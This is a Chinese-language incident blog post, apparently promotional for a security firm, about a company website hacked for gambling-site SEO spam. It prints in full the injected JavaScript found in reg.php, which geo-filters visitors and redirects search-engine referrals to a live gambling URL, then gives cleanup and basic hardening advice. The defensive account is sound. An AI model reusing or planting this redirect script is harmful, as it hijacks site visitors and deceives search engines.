最近公司網站莫名的訪問量減少,網站在百度搜索裡排名也都下滑到第二頁去了
,也不知道怎麼回事搞得最近很煩,領導也找我談話,問網站怎麼管理維護的,一直穩
定了好幾年的網站排名,怎麼最近都跌倒後頭去了,我說可能最近百度做調整吧,很快
排名會上來的,本來也沒有太在意,因為之前遇到過百度抽風的這些情況。
最近也加上客戶訂單越來越少,領導也是著急,很大一部分客戶渠道來源都從百度點擊
來的,靜下心來看看網站到底是怎麼回事,不看不要緊,簡直嚇我一跳。eSafe白帽資安網公司
是一家專注於:主機安全、網站安全、網站漏洞檢測、網站安全測試、滲透測試服務
一體的網絡安全服務提供商。
網站在百度裡的收錄增加許多,本來以為是更新的文章導致的,可是仔細一想也沒那麼
多的收錄呀,site:網站,點擊到十頁以後竟然發現了問題的關鍵,百度收錄了一大堆我
們網站沒有的URL鏈接,複製那個我們域名的鏈接,提示不存在,從百度收錄點進去跳轉
到博彩網站。
360提示:未經證實的博彩賭博網站
您訪問的網站含有未經證實的境外博彩或非法賭博的相關內容,可能給您造成財產損失,
請您謹慎訪問。
如下圖所示:
我這才明白過來,原來是我網站被駭了。
趕緊連網站的FTP,下載網站程序代碼到本地,然後挨個對每一個代碼進行查看,查看是
不是網站被駭客植入了木馬後門,果不其然在會員系統裡的註冊頁面reg.php發現了駭客
插入的惡意代碼:
document.write ('<script language="javascript" type="text/javascript"
src="//js.users.51.la/19197547.js"></script>');
var jump_head = document.getElementsByTagName('head')[0];
var jump_script= document.createElement('script');
jump_script.type= 'text/javascript';
jump_script.src= 'http://int.dpool.sina.com.cn/iplookup/iplookup.php?
format=js';
jump_head.appendChild(jump_script);
var jump_myt = setInterval(function(){
if (remote_ip_info) {
clearInterval(jump_myt);
if (remote_ip_info.city == '\u798f\u5efa' ||
remote_ip_info.province == '\u798f\u5efa') {
}else{
go_bots_url();
}
}
},500);
function go_bots_url(){
var init_flag = "93989",
bct = document.referrer,
bot = ['baidu', 'google', 'yahoo', 'bing', 'soso', 'sogou',
'360.cn', 'so.com', 'youdao', 'anquan','sm.cn'];//, 'haosou'];
for (var i in bot) {
if (bct.indexOf(bot[i]) != -1) {
init_flag = "1245";
document.writeln("<script language=
\"javascript\">window.location=\"http://www.889vv.net/?Intr=36710998\";<
\/script>")
}
}
if(init_flag == "93989"){
call_init_error();
}
}
隨即我就以www.889vv.net為特徵碼進行搜索,在data目錄下數據庫文件裡發現了被插
入了同樣的惡意代碼,然後手動刪除了這兩個代碼,網站被跳轉到博彩網站問題解決了
,從百度來的點擊,網站也沒有再跳轉到博彩網站上去。通過這一次經歷,徹徹底底的
明白了網站安全的重要性,不管是做優化,還是維護網站的,都要時刻注意網站安全,
習近平主席說過,沒有網絡安全,就沒有國家安全,安全還是要重視起來,這一次安全
事故,也給我們公司上了一課,2個月的時間流失了多少客戶,少了多少訂單,損失慘重
。
接下來,還有百度的博彩快照的清除,一個一個投訴到百度站長中心,等待百度的快照
更新,慢慢的再增加原創文章,加點外鏈,把網站百度權重提高上去。本身網站有七八
年的時間了,在百度也算老站了,應該也會很快的恢復網站排名。
對於新手在網站安全方面,如何加固網站安全,我大體說一下,很多不懂網站安全的可能
會很迷糊,那我寫下來,希望能幫到更多像我一樣情況的網站管理員。
網站被木馬,通常就是駭客利用網站程序或者是語言腳本解釋漏洞上傳一些可以直接對
站點文件進行修改腳本木馬,然後通過web形式去訪問那個腳本木馬實現對當前的網站
文件進行修改,比如加入一段廣告代碼,通常是iframe或者script。
想知道網站是否被掛馬,有個比較簡單的方法,直接檢查每個腳本文件最下方是否被加
入了iframe或者script的代碼,然後這段代碼是否是程序員設計時候添加的,程序員一
看就能夠知道。
網站安全防範的方式也簡單:
1、網站代碼漏洞,這需要有安全意識的程序員才能修復得了,通常是出現被掛馬以後才
知道要針對哪方面入手修復;
2、也可以通過網站安全公司來解決,國內也就esafe.tw和綠盟等安全公司比較專業.
3. 主機目錄權限的“讀”、“寫”、“執行”,“是否允許腳本”,等,使用經營已
久的虛擬空間提供商的空間,可以有效降低被掛馬的幾率。